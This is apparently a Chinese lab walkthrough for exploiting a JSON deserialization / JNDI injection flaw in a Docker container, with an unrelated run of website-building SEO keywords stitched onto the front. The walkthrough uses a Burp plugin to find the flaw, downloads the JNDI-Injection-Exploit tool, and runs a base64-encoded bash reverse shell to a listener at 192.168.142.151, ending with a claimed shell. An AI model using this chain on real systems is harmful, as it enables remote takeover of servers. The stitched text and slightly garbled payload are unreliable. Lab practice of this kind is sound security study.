海尔电子商务网站建设,沈阳网站建设dnglzx,网站制作前期,wordpress怎么安装模板文件拉取docker容器 访问并抓包 修改为POST 方式#xff0c;文件类型改为json格式#xff0c;发送json数据包#xff0c;发送成功 这里安装一个bp的插件 使用安装的插件 可以看到#xff0c;插件告诉我们这里有漏洞#xff0c;并且提供了POC 既然我们发现有 rmi #xff0c;…拉取docker容器 访问并抓包 修改为POST 方式文件类型改为json格式发送json数据包发送成功 这里安装一个bp的插件 使用安装的插件 可以看到插件告诉我们这里有漏洞并且提供了POC 既然我们发现有 rmi 那么我们需要构建一个 rmi 服务器 [ JNDI ] sudo wget https://github.com/welk1n/JNDI-Injection-Exploit/releases/download/v1.0/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar 使用这个工具创建一个文件夹如果文件夹创建成功就表示可以利用 将payload复制到bp 生成了文件夹 对反弹shell进行base64编码 把上面的反弹 shell 进行 base64 编码然后修改成 bash -c {echo, 你的 base64 编码结果 }|{base64,-d}|{bash-i} 开启监听。然后输入命令 java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C bash -c {echo,YmFzaCAtaSAJiAvZGV2L3RjcC8xOTIuMTY4LjE0Mi4xNTEvMTIzNCAwPiYx}|{base64,-d}|{bash,-i} -A 192.168.142.151 成功获得反弹shell2